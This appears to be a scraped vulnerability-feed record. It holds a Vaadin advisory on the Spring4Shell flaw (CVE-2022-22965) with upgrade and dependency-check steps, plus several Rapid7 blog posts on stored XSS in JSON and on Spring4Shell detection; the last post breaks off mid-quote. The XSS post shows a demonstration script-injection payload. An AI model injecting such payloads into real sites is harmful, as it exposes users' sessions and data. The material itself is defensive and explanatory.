A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.
# Spring Core Remote Code Execution via Data Binding on JDK 9+

Advisory ID: VAADIN:ADVISORY-2022-04-01 | CVE: CVE-2022-22965 | Published: 2022-04-01 | Modified: 2022-04-01 | Source: https://vaadin.com/security/2022-04-01

A remote code execution (RCE) vulnerability was discovered in the Spring framework, affecting at least Spring versions 4.x and 5.x. A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. Vaadin applications are not affected by default, but the nature of the vulnerability is more general, and there may be other ways to exploit it.

## Description

A remote code execution (RCE) vulnerability was discovered in the Spring framework, affecting at least Spring versions 4.x and 5.x. A Vaadin Flow application does not use the vulnerable Spring MVC or Spring WebFlux features by default, but we still strongly recommend upgrading to a non-vulnerable version of Spring. All Hilla applications always use Spring MVC and should be upgraded.

The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.

If you are unable to upgrade to a non-vulnerable version of Spring Boot, you should apply the workaround described in https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#vulnerability

## Affected products and mitigation

The following products are not vulnerable by default but can be exploited if Spring MVC or Spring WebFlux features are used in the application:

| Product version | Mitigation |
| --- | --- |
| Vaadin 7 | Apply the workaround described in the Spring blog post. The Vaadin Spring integration is based on Spring 4.x, which has not received the security fix as it is end-of-life. (Vaadin 7 extended maintenance) |
| Vaadin 8 | If you can, upgrade to Spring Boot 2.6.6 and. If you are unable to upgrade to Spring Boot 2.6.6, apply the workaround described in the Spring blog post. (Vaadin 8 extended maintenance) |
| Vaadin 10 | If you can, upgrade to Spring Boot 2.6.6. If you are unable to upgrade to Spring Boot 2.6.6, apply the workaround described in the Spring blog post. |
| Vaadin 14 | Upgrade to Spring Boot 2.5.12 or Spring Boot 2.6.6. |
| Vaadin 22 | Upgrade to Spring Boot 2.6.6. |
| Vaadin 23 | Upgrade to Spring Boot 2.6.6. |

## Affected Hilla projects and mitigation

Hilla-based applications include the Spring dependency and are affected by the vulnerability.

| Product version | Mitigation |
| --- | --- |
| Hilla 1.0.0 - 1.0.3 | Upgrade to Spring Boot 2.6.6. |

## How to check if you are vulnerable?

You can check your Vaadin and Vaadin Flow project for the vulnerable dependency, e.g. with Maven:

```
% mvn dependency:tree | grep spring-beans
[INFO] | | | \- org.springframework:spring-beans:jar:5.3.16:compile
```

If the version is 5.3.18 or newer or 5.2.20, then you are safe. Otherwise, you need to update your project.

Fix by using one of the following versions:

- Update to Spring Framework 5.3.18 and 5.2.20, which contain the fixes
- Update to Spring Boot 2.6.6 and 2.5.12 that depend on Spring Framework 5.3.18

Verify that the version with the fix is in place by re-running the dependency check:

```
% mvn dependency:tree | grep spring-beans
[INFO] | | | \- org.springframework:spring-beans:jar:5.3.18:compile
```

Remember to rebuild and redeploy your project.

## References

- Vendor advisory: https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement
- Vendor advisory: https://tanzu.vmware.com/security/cve-2022-22965

---

I recently wrote a blog post on [injection-type vulnerabilities](<http://rapid7.com/blog/post/2021/10/19/owasp-top-10-deep-dive-injection-and-stack-traces-from-a-hackers-perspective/>) and how they were knocked down a few spots from 1 to 3 on the new [OWASP Top 10 for 2022](<https://www.rapid7.com/blog/post/2021/09/30/the-2021-owasp-top-10-have-evolved-heres-what-you-should-know/>). The main focus of that article was to demonstrate how stack traces could be — and still are — used via injection attacks to gather information about an application to further an attacker's goal. In that post, I skimmed over one of my all-time favorite types of injections: [cross-site scripting (XSS)](<https://www.rapid7.com/fundamentals/cross-site-scripting/>).

In this post, I’ll cover this gem of an exploit in much more depth, highlighting how it has managed to adapt to the newer environments of today’s modern web applications, specifically the API and JavaScript Object Notation (JSON).

I know the term API is thrown around a lot when referencing web applications these days, but for this post, I will specifically be referencing requests made from the front end of a web application to the back end via ajax (Asynchronous JavaScript and XML) or more modern approaches like the fetch method in JavaScript.

Before we begin, I'd like to give a quick recap of what XSS is and how a legacy application might handle these types of requests that could trigger XSS, then dive into how XSS still thrives today in modern web applications via the methods mentioned so far.

## What is cross-site scripting?

There are many types of XSS, but for this post, I’ll only be focusing on persistent XSS, which is sometimes referred to as stored XSS.

XSS is a type of injection attack, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to execute malicious code — generally in the form of a browser-side script like JavaScript, for example — against an unsuspecting end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application accepts an input from a user without sanitizing, validating, escaping, or encoding it.

Because the end user’s browser has no way to know not to trust the malicious script, the browser will execute the script. Because of this broken trust, attackers typically leverage these vulnerabilities to steal victims’ cookies, session tokens, or other sensitive information retained by the browser. They could also redirect to other malicious sites, install keyloggers or crypto miners, or even change the content of the website.

Now for the "stored" part. As the name implies, stored XSS generally occurs when the malicious payload has been stored on the target server, usually in a database, from input that has been submitted in a message forum, visitor log, comment field, form, or any parameter that lacks proper input sanitization.

What makes this type of XSS so much more damaging is that, unlike reflected XSS – which only affects specific targets via cleverly crafted links – stored XSS affects anyone and everyone visiting the compromised site. This is because the XSS has been stored in the application's database, allowing for a much larger attack surface.

## Old-school apps

Now that we’ve established a basic understanding of stored XSS, let's go back in time a few decades to when web apps were much simpler in their communications between the front-end and back-end counterparts.

Let's say you want to change some personal information on a website, like your email address on a contacts page. When you enter your email address and click the update button, it triggers the POST method to send the form data to the back end to update that value in a database. The database updates the value in a table, then pushes a response back to the web application's front end, or UI, for you to see. This would usually result in the entire page having to reload to display only a very minimal amount of change in content, and while it’s very inefficient, nonetheless the information would be added and updated for the end user to consume.

In the example below, clicking the update button submits a POST form request to the back-end database where the application updates and stores all the values, then provides a response back to the webpage with the updated info.

## Old-school XSS

As mentioned in my previous blog post on injection, I give an example where an attacker enters a payload of `<script>alert("This is XSS")</script>` instead of their email address and clicks the update button. Again, this triggers the POST method to take our payload and send it to the back-end database to update the email table, then pushes a response back to the front end, which gets rendered back to the UI in HTML. However, this time the email value being stored and displayed is my XSS payload, `<script>alert("This is XSS")</script>`, not an actual email address.

As seen above, clicking the “update” button submits the POST form data to the back end where the database stores the values, then pushes back a response to update the UI as HTML.

However, because our payload is not being sanitized properly, our malicious JavaScript gets executed by the browser, which causes our alert box to pop up as seen below.

While the payload used in the above example is harmless, the point to drive home here is that we were able to get the web application to store and execute our JavaScript all through a simple contact form.
Anyone visiting my contact page will see this alert pop up because my XSS payload has been stored in the database and gets executed every time the page loads. From this point on, the possible damage that could be done here is endless and only limited by the attacker\u2019s imagination\u2026 well, and their coding skills. \n\n## New-school apps\n\nIn the first example I gave, when you updated the email address on the contact page and the request was fulfilled by the backend, the entire page would reload in order to display the newly created or updated information. You can see how inefficient this is, especially if the only thing changing on the page is a single line or a few lines of text. Here is where ajax and/or the fetch method comes in.\n\n[Ajax, or the fetch method](<https://www.w3schools.com/whatis/whatis_ajax.asp>), can be used to get data from or post data to a remote source, then update the front-end UI of that web application without having to refresh the page. Only the content from the specific request is updated, not the entire page, and that is the key difference between our first example and this one.\n\nAnd a very popular format for said data being sent and received is JavaScript Object Notation, most commonly known as JSON. (Don't worry, I\u2019ll get back to those curly braces in just a bit.) \n\n## New-school XSS\n\n_(Well, not really, but it sounds cool.)_\n\nNow, let's pretend we\u2019ve traveled back to the future and our contact page has been rewritten to use ajax or the fetch method to send and receive data to and from the database. From the user's point of view, nothing has changed \u2014 still the same ol\u2019 form. But this time, when the email address is being updated, only the contact form refreshes. The entire page and all of its contents do not refresh like in the previous version, which is a major win for efficiency and user experience. 
\n\nBelow is an example of what a POST might look like formatted in JSON.\n\n\n\n\u201cWhat is JSON?\u201d you might ask. Short for JavaScript Object Notation, it is a lightweight text format for storing and transferring data and is most commonly used when sending data to and from servers. Remember those curly braces I mentioned earlier? Well, one quick and easy way to spot JSON is the formatting and the use of curly braces.\n\nIn the example above, you can see what our new POST looks like using ajax or the fetch method in JavaScript. While the end result is no different than before, as seen in the example below, the method that was used to update the page is quite different. The key difference here is that the data we\u2019re wanting to update is being treated as just that: data, but in the form of JSON as opposed to HTML.\n\n\n\nNow, let's inject the same XSS payload into the same email field and hit update. In the example below, you can see that our POST request has been wrapped in curly braces, using JSON, and is formatted a bit differently than previously before being sent to the back end to be processed.\n\n\n\n\n\nIn the example above, you can see that the application is allowing my email address to be the XSS payload in its entirety. However, the JavaScript here is only being displayed and not being executed as code by the browser, so the alert \u201cpop\u201d message never gets triggered as in the previous example. That again is the key difference from the original way we were fulfilling the requests versus our new, more modern way \u2014 or in short, using JSON instead of HTML.\n\nNow you might be asking yourself, what's wrong with allowing the XSS payload to be the email address if it's only being displayed and not being executed as JavaScript by the browser. 
That is a valid question, but hear me out.\n\nSee, I've been working in this industry long enough to know that the two most common responses to a question or statement regarding cybersecurity begin with either \u201cthat depends\u2026\u201d or \u201cwhat if\u2026\u201d I'm going to go with the latter here and throw a couple what-ifs at you.\n\nNow that my XSS is stored in your database, it\u2019s only a matter of time before this ticking time bomb goes off. Just because my XSS is being treated as JSON and not HTML now does not mean that will always be the case, and attackers are betting on this.\n\nHere are a few scenarios.\n\n### Scenario 1\n\nWhat if team B handles this data differently from team A? What if team B still uses more traditional methods of sending and receiving data to and from the back end and does leverage the use of HTML and not JSON? \n\nIn that case, the XSS would most likely eventually get executed. It might not affect the website that the XSS was originally injected into, but the stored data can be (and usually is) also used elsewhere. The XSS stored in that database is probably going to be shared and used by multiple other teams and applications at some point. The odds of all those different teams leveraging the exact same standards and best practices are slim to none, and attackers know this. \n\n### Scenario 2\n\nWhat if, down the road, a developer using more modern techniques like ajax or the fetch method to send and receive data to and from the back end decides to use the .innerHTML property instead of .innerText to load that JSON into the UI? 
All bets are off, and the stored XSS that was previously being protected by those lovely curly braces will now most likely get executed by the browser.\n\n### Scenario 3\n\nLastly, what if the current app had been developed to use server-side rendering, but a decision from higher up has been made that some costs need to be cut and that the company could actually save money by recoding some of their web apps to be client-side rather than server-side? \n\nPreviously, the back end was doing all the work, including sanitizing all user input, but now the shift will be for the browser to do all the heavy lifting. Good luck spotting all the XSS stored in the DB \u2014 in its previous state, it was \u201charmless,\u201d but now it could get rendered to the UI as HTML, allowing the browser to execute said stored XSS. In this scenario, a decision that was made upstream will have an unexpected security impact downstream, both figuratively and literally \u2014 a situation that is all too well-known these days.\n\n## Final thoughts\n\nPart of my job as a security advisor is to, well, advise. And it's these types of situations that keep me up at night. I come across XSS in applications every day, and while I may not see as many fun and exciting \u201cpops\u201d as in years past, I see something a bit more troubling. \n\nThis type of XSS is what I like to call a \u201csleeper vuln\u201d \u2013 laying dormant, waiting for the right opportunity to be woken up. If I didn't know any better, I'd say XSS has evolved and is aware of its new surroundings. Of course, XSS hasn\u2019t evolved, but the applications in which it lives have. 
\n\nAt the end of the day, we\u2019re still talking about the same XSS from its conception, the same XSS that has been on the [OWASP Top 10](<https://www.rapid7.com/blog/post/2021/09/30/the-2021-owasp-top-10-have-evolved-heres-what-you-should-know/>) for decades \u2014 what we\u2019re really concerned about is the lack of sanitization or handling of user input. But now, with the massive adoption of JavaScript frameworks like Angular, libraries like React, the use of APIs, and the heavy reliance on them to handle the data properly, we\u2019ve become complacent in our duties to harden applications the proper way.\n\nThere seems to be a division in camps around XSS in JSON. On the one hand, some feel that since the JavaScript isn't being executed by the browser, everything is fine. Who cares if an email address (or any data for that matter) is potentially dangerous \u2014 _**as long as**_ it's not being executed by the browser. And on the other hand, you have the more fundamentalist, dare I say philosophical thought that all user input should never be trusted: It should always be sanitized, regardless of whether it\u2019s treated as data or not \u2014 and not solely because of following best coding and security practices, but also because of the \u201cthat depends\u201d and \u201cwhat if\u201d scenarios in the world. \n\nI'd like to point out in my previous statement above, that \u201c_**as long as**_\u201d is vastly different from _**\u201c**cannot._\u201d \u201cAs long as\u201d implies situational awareness and that a certain set of criteria need to be met for it to be true or false, while \u201ccannot\u201d is definite and fixed, regardless of the situation or criteria. \u201cAs long as the XSS is wrapped in curly braces\u201d means it does not pose a risk in its current state but could in other states. 
But if input is sanitized and escaped properly, the XSS would never exist in the first place, and thus it \u201ccannot\u201d or could not be executed by the browser, ever.\n\nI guess I cannot really complain too much about these differences of opinions though. The fact that I'm even having these conversations with others is already a step in the right direction. But what does concern me is that it's 2022, and we\u2019re still seeing XSS rampant in applications, but because it's wrapped in JSON somehow makes it acceptable. One of the core fundamentals of my job is to find and prioritize risk, then report. And while there is always room for discussion around the severity of these types of situations, lots of factors have to be taken into consideration, a spade isn't always a spade in [application security](<https://www.rapid7.com/fundamentals/web-application-security/>), or cybersecurity in general for that matter. But you can rest assured if I find XSS in JSON in your environment, I will be calling it out. \n\nI hope there will be a future where I can look back and say, \u201cRemember that one time when curly braces were all that prevented your website from getting hacked?\u201d Until then, JSON or not, never trust user data, and sanitize all user input (and output for that matter). 
A mere { } should never be the difference between your site getting hacked or not.\n\n_**Additional reading:**_\n\n * _[Cloud-Native Application Protection (CNAPP): What's Behind the Hype?](<https://www.rapid7.com/blog/post/2022/05/02/cloud-native-application-protection-cnapp-whats-behind-the-hype/>)_\n * _[Rapid7 Named a Visionary in 2022 Magic Quadrant\u2122 for Application Security Testing Second Year in a Row](<https://www.rapid7.com/blog/post/2022/04/21/rapid7-named-a-visionary-in-2022-magic-quadrant-for-application-security-testing-second-year-in-a-row/>)_\n * _[Let's Dance: InsightAppSec and tCell Bring New DevSecOps Improvements in Q1](<https://www.rapid7.com/blog/post/2022/04/15/lets-dance-insightappsec-and-tcell-bring-new-devsecops-improvements-in-q1/>)_\n * _[Securing Your Applications Against Spring4Shell (CVE-2022-22965)](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-04T15:48:03", "type": "rapid7blog", "title": "XSS in JSON: Old-School Attacks for Modern Applications", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-04T15:48:03", "id": "RAPID7BLOG:07EA4EC150B77E4EB3557E1B1BA39725", "href": "https://blog.rapid7.com/2022/05/04/xss-in-json-old-school-attacks-for-modern-applications/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:04:09", "description": "\n\nSummer is in full swing, and that means soaring temperatures, backyard grill-outs, and the latest roundup of Q2 application security improvements from Rapid7. Yes, we know you\u2019ve been waiting for this moment with more anticipation than Season 4 of Stranger Things. So let\u2019s start running up that hill, not beat around the bush (see what we did there?), and dive right in.\n\n## OWASP Top 10 for application security\n\nWay, way back in September of 2021 (it feels like it was yesterday), the Open Web Application Security Project (OWASP) released its [top 10 list of critical web application security risks](<https://www.rapid7.com/blog/post/2021/09/30/the-2021-owasp-top-10-have-evolved-heres-what-you-should-know/>). Naturally, we were all over it, as OWASP is one of the most trusted voices in cybersecurity, and their Top 10 lists are excellent places to start understanding where and how threat actors could be coming for your applications. We released [a ton of material](<https://www.rapid7.com/blog/tag/owasp-top-10-2021/>) to help our customers better understand and implement the recommendations from OWASP.\n\nThis quarter, we were able to take those protections another big step forward by providing an [OWASP 2021 Attack Template and Report for InsightAppSec](<https://www.rapid7.com/blog/post/2022/05/18/find-fix-and-report-owasp-top-10-vulnerabilities-in-insightappsec/>). 
With this new feature, your security team can work closely with development teams to discover and remediate vulnerabilities in ways that jibe with security best practice. It also helps to focus your AppSec program around the updated categories provided by OWASP (which we highly suggest you do).\n\nThe new attack template includes all the relevant attacks included in the updated OWASP Top 10 list which means you can focus on the most important vulnerabilities to remediate, rather than be overwhelmed by too many vulnerabilities and not focusing on the right ones. Once the vulns are discovered, [InsightAppSec](<https://www.rapid7.com/products/insightappsec/>) helps your development team to remediate the issues in several different ways, including a new OWASP Top 10 report and the ability to let developers confirm vulnerabilities and fixes with Attack Replay.\n\n## Scan engine and attack enhancements\n\nProduct support for OWASP 2021 wasn\u2019t the only improvement we made to our [industry-leading DAST](<https://www.rapid7.com/blog/post/2022/04/21/rapid7-named-a-visionary-in-2022-magic-quadrant-for-application-security-testing-second-year-in-a-row/>) this quarter. In fact, we\u2019ve been quite busy adding additional attack coverage and making scan engine improvements to increase coverage and accuracy for our customers. Here are just a few. \n\n### Spring4Shell attacks and protections with InsightAppSec and tCell\n\nWe instituted a pair of improvements to InsightAppSec and [tCell](<https://www.rapid7.com/products/tcell/>) meant to identify and block the now-infamous [Spring4Shell](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) vulnerability. We now have included a default RCE attack module specifically to test for the Spring4Shell vulnerability with InsightAppSec. 
That feature is available to all InsightAppSec customers right now, and we highly recommend using it to prevent this major vulnerability from impacting your applications. \n\nAdditionally, for those customers leveraging tCell to protect their apps, we've added new detections and the ability to block Spring4Shell attacks against your web applications. In addition, we've added Spring4Shell coverage for our Runtime SCA capability. Check out [more here](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>) on both of these new enhancements. \n\n### New out-of-band attack module\n\nWe\u2019ve added a new out-of-band SQL injection module similar to Log4Shell, except it leverages the DNS protocol, which is typically less restricted and used by the adversary. It's included in the \"All Attacks\" attack template and can be added to any customer attack template.\n\n### Improved scanning for session detection\n\nWe have made improvements to our scan engine on InsightAppSec to better detect unwanted logouts. When configuring authentication, the step-by-step instructions will guide you through configuring this process for your web applications.\n\n## Making it easier for our customers\n\nThis wouldn\u2019t be a quarterly feature update if we didn\u2019t mention ways we are making InsightAppSec and tCell even easier and more efficient for our customers. In the last few months, we have moved the \"Manage Columns\" function into \"Vulnerabilities\" in InsightAppSec to make it even more customizable. You can now also hide columns, drag and drop them where you would like, and change the order in ways that meet your needs. \n\nWe\u2019ve also released an AWS AMI of the tCell nginx agent to make it easier for current customers to deploy tCell. This is perfect for those who are familiar with AWS and want to get up and running with tCell fast. 
Customers who also want a basic understanding of how tCell works and want to share tCell\u2019s value with their dev teams will find this new AWS AMI to provide insight fast. \n\nSummer may be a time to take it easy and enjoy the sunshine, but we\u2019re going to be just as hard at work making improvements to InsightAppSec and tCell over the next three months as we were in the last three. With a break for a hot dog and some fireworks in there somewhere. Stay tuned for more from us and have a great summer.\n\n_**Additional reading:**_\n\n * _[Application Security in 2022: Where Are We Now?](<https://www.rapid7.com/blog/post/2022/06/29/application-security-in-2022-where-are-we-now/>)_\n * _[API Security: Best Practices for a Changing Attack Surface](<https://www.rapid7.com/blog/post/2022/06/27/api-security-best-practices-for-a-changing-attack-surface/>)_\n * _[How to Secure App Development in the Cloud, With Tips From Gartner](<https://www.rapid7.com/blog/post/2022/06/22/how-to-secure-app-development-in-the-cloud-with-tips-from-gartner/>)_\n * _[Find, Fix, and Report \u200bOWASP Top 10 Vulnerabilities in InsightAppSec](<https://www.rapid7.com/blog/post/2022/05/18/find-fix-and-report-owasp-top-10-vulnerabilities-in-insightappsec/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-13T15:45:00", "type": "rapid7blog", "title": "It\u2019s the Summer of AppSec: Q2 Improvements to Our Industry-Leading DAST and WAAP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-07-13T15:45:00", "id": "RAPID7BLOG:66B9F80A5ED88EFA9D054CBCE8AA19A5", "href": "https://blog.rapid7.com/2022/07/13/its-the-summer-of-appsec-q2-improvements-to-our-industry-leading-dast-and-waap/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-08T21:29:15", "description": "\n\nThe warm weather is starting to roll in, the birds are chirping, and Spring... well, [Spring4Shell](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) is making a timely entrance. If you\u2019re still recovering from [Log4Shell](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>), we\u2019re here to tell you you're not alone. While discovery and research of [CVE-2022-22965](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) is evolving, [Rapid7 is committed](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>) to providing our customers updates and guidance. 
In this blog, we wanted to share some recent product enhancements across our [application security](<https://www.rapid7.com/fundamentals/web-application-security/>) portfolio to help our customers with easy ways to test and secure their apps against Spring4Shell.\n\n## What is Spring4Shell?\n\nBefore we jump into how we can help you with our products, let's give a quick overview of Spring4Shell. CVE-2022-22965 affects Spring MVC and Spring WebFlux applications running JDK versions 9 and later. A new feature was introduced in JDK version 9 that allows access to the ClassLoader from a Class. This vulnerability can be exploited for remote code execution (RCE). If you\u2019re looking for more detailed information on Spring4Shell, check out our overview blog [here](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>).\n\n## _Updated: _RCE Attack Module for Spring4Shell\n\nCustomers leveraging [InsightAppSec](<https://www.rapid7.com/products/insightappsec/>), our dynamic application security testing (DAST) tool, can regularly assess the risk of their applications. InsightAppSec allows you to configure 100+ types of web attacks to simulate real-world exploitation attempts. While it may be April 1st, we\u2019re not foolin\u2019 around when it comes to our excitement in sharing [this update](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>) to our RCE Attack Module that we\u2019ve included in the default All Modules Attack Template \u2013 specifically testing for Spring4Shell. \n\nCloud customers who already have the [All Modules Attack Template](<https://docs.rapid7.com/insightappsec/attack-templates>) enabled will automatically benefit from this new RCE attack as part of their regular scan cadence. As of April 4th, customers with [on-prem scan engines](<https://docs.rapid7.com/release-notes/appspider/20220404/>) can also benefit from this updated RCE attack module. 
For those customers with on-premises engines, make sure to have auto-upgrades turned on to automatically benefit from this updated Attack Module, or update manually to the latest scan engine. \n\n\n\n\n## _NEW:_ Block against Spring4Shell attacks\n\nIn addition to assessing your applications for attacks with InsightAppSec, we\u2019ve also got you covered when it comes to protecting your in-production applications. With [tCell](<https://www.rapid7.com/products/tcell/>), customers can both detect and block anomalous activity, such as Spring4Shell exploit attempts. Check out the GIF below on how to enable the recently added Spring RCE block rule in tCell.\n\n\n\n## _NEW:_ Identify vulnerable packages (such as CVE-2022-22965)\n\nA key component of Spring4Shell is detecting whether or not you have any vulnerable packages. tCell customers leveraging the [Java agent](<https://docs.rapid7.com/tcell/installing-the-java-agent-for-tomcat>) can determine if they have any vulnerable packages, including CVE-2022-22965, in their runtime environment.\n\nSimply navigate to tCell on the Insight Platform, select your application, and navigate to the [**Packages and Vulns**](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) tab. Here you can view any vulnerable packages that were detected at runtime, and follow the specified remediation guidance.\n\n\n\nCurrently, the recommended mitigation guidance is for Spring Framework users to update to the fixed versions. Further information on the vulnerability and ongoing guidance are being provided in [Spring\u2019s blog here](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>).\n\n## Utilize OS commands\n\nOne of the benefits of using tCell\u2019s [app server agents](<https://docs.rapid7.com/tcell/install-an-agent>) is the fact that you can enable blocking (after confirming you\u2019re not blocking any legitimate commands) for OS commands. 
This will prevent a wide range of exploits including Shell commands. Below you will see an example of our [**OS Commands**](<https://docs.rapid7.com/tcell/command-injection>) dashboard highlighting the execution attempts, and in the second graphic, you\u2019ll see the successfully blocked OS command events.\n\n\n\n \n\n\n\n\n## What\u2019s next?\n\nWe recommend following [Spring\u2019s latest guidance](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) on remediation to reduce risk in your applications. If you\u2019re looking for more information at any time, we will continue to update both this blog, and our [initial response blog to Spring4Shell](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>). Additionally, you can always reach out to your customer success manager, support resources, or anyone on your Rapid7 account team. Happy April \u2013 and here\u2019s to hoping the only shells you deal with in the future are those found on the beach!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T22:26:36", "type": "rapid7blog", "title": "Securing Your Applications Against Spring4Shell (CVE-2022-22965)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T22:26:36", "id": "RAPID7BLOG:3CB617802DB281BCA8BA6057AE3A98E0", "href": "https://blog.rapid7.com/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-15T15:31:14", "description": "> _To the left, to the left, to the right, right \u2014 the CI/CD Pipeline is on the move._\n\n\n\nDevSecOps is all about adding security across the application lifecycle. A popular approach to application security is to [shift left](<https://www.rapid7.com/blog/post/2021/09/27/to-the-left-your-guide-to-infrastructure-as-code-for-shifting-left/>), which means moving security earlier in the [software development lifecycle (SDLC)](<https://www.rapid7.com/fundamentals/software-development-life-cycle-sdlc/>). This makes sense: If you find a critical security bug in production, it costs a lot more to resolve it than if you found it in development.\n\nIn Q1 2022, we've continued to invest in improvements to [InsightAppSec](<https://www.rapid7.com/products/insightappsec/>) and [tCell](<https://www.rapid7.com/products/tcell/>) that help organizations shift left and automate security testing prior to production deployment. And at the same time, we've made other enhancements to make your life easier. Oh\u2026 and we added new attacks and blocking rules for [Spring4Shell](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>).\n\n## Shifting app security testing left in the CI/CD pipeline\n\nYour development teams are innovating and releasing features and new experiences faster than ever before. 
Manual testing can no longer keep up with the speed of innovation. Taking a [DevSecOps](<https://www.rapid7.com/fundamentals/devsecops/>) approach means baking security across the application lifecycle and includes shifting left whenever possible.\n\n[Dynamic application security testing (DAST)](<https://www.rapid7.com/fundamentals/dast/>) solutions simulate attacks just like the attackers, and they're known for their accuracy and coverage across a wide range of technologies. However, traditional DAST solutions have struggled to work with modern applications and software development methodologies.\n\nSince the launch of InsightAppSec \u2014 Rapid7's industry leading cloud-native DAST \u2014 we've focused on providing coverage of modern applications, as well as being able to integrate as far left as the build process.\n\n> _\u201cOur app developers don't need to come to me, they don't need to come to our team, they don't need to send emails. They don't need to go through any formalities. When they commit code, the scan happens automatically. And, we created the metrics. So, if they see high-rated vulnerabilities they cannot push to production. 
